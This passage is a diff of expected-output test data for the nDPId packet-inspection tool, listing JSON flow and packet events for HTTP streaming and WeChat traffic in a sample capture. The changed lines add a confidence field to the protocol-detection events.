-01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01176{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 01101{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"}
 02018{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYxMDNkNTU4OTU2YWQwYWY2YTU2Mw=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="}
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"ts_msec":1429000049272,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeTkfkAAPwYGIQo2qfp4HCMoyycAUPhJNysVgOaYUBgDEEglAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDAxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="}
-00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
+00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
 01931{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKkAeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"}
 01177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="}
 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01044{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"ts_msec":1429000052217,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjSUAAPwaHVgo2qfp4HCMoyykAUHABsefLT2i4UBgBySAFAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIwLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="}
-01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 